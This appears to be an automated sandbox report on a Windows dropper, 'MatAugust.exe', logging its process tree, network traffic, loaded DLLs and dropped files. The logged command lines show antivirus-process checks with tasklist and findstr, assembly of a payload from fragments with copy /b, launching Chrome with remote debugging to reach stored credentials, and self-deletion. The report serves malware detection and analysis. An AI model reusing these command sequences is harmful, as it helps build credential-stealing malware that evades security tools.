Source: chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065931201.0000250C00CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000011.00000002.2062853756.0000250C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 51522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51507
Source: unknown	Network traffic detected: HTTP traffic on port 51526 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51507 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51512 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51516 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51515
Source: unknown	Network traffic detected: HTTP traffic on port 51523 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51516
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51513
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51514
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51519
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51517
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51518
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51512
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51510
Source: unknown	Network traffic detected: HTTP traffic on port 51513 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51517 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51526
Source: unknown	Network traffic detected: HTTP traffic on port 51524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51524
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51528
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51520 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51522
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51523
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51520
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51521
Source: unknown	Network traffic detected: HTTP traffic on port 51528 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51510 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51514 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51518 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 51521 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51515 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 51519 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: C:\Users\user\Desktop\MatAugust.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\Desktop\MatAugust.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\Desktop\MatAugust.exe

Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,

0_2_00403883

Source: C:\Users\user\Desktop\MatAugust.exe	File created: C:\Windows\NewtonMetallic	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	File created: C:\Windows\ArchQuoted	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	File created: C:\Windows\ConsidersFalls	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	File created: C:\Windows\ConvictionSuggesting	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	File created: C:\Windows\SwitchObserver	Jump to behavior

Source: C:\Users\user\Desktop\MatAugust.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\MatAugust.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\MatAugust.exe	Code function: 0_2_004074BB	0_2_004074BB

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\MatAugust.exe

Code function: String function: 004062A3 appears 57 times

Source: MatAugust.exe

Static PE information: invalid certificate

Source: MatAugust.exe, 00000000.00000002.1666697764.00000000005BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs MatAugust.exe
Source: MatAugust.exe, 00000000.00000003.1663754267.00000000005BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs MatAugust.exe

Source: MatAugust.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@47/49@9/7

Source: C:\Users\user\Desktop\MatAugust.exe

0_2_004044A5

Source: C:\Users\user\Desktop\MatAugust.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\Desktop\MatAugust.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Trees

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_03

Source: C:\Users\user\Desktop\MatAugust.exe

File created: C:\Users\user\AppData\Local\Temp\nsy6AC8.tmp

Jump to behavior

Source: MatAugust.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\MatAugust.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\MatAugust.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: 4wln7gvsr.12.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: MatAugust.exe	Virustotal: Detection: 31%
Source: MatAugust.exe	ReversingLabs: Detection: 24%

Source: C:\Users\user\Desktop\MatAugust.exe

File read: C:\Users\user\Desktop\MatAugust.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MatAugust.exe "C:\Users\user\Desktop\MatAugust.exe"
Source: C:\Users\user\Desktop\MatAugust.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 164676
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Grab
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "slovenia" Contractors
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com Stopped.com h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2272,i,12603068137312360975,10609379310723009523,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\wlxlf" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\MatAugust.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 164676	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Grab	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "slovenia" Contractors	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com Stopped.com h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\wlxlf" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2272,i,12603068137312360975,10609379310723009523,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\MatAugust.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	Section loaded: winhttp.dll	Jump to behavior
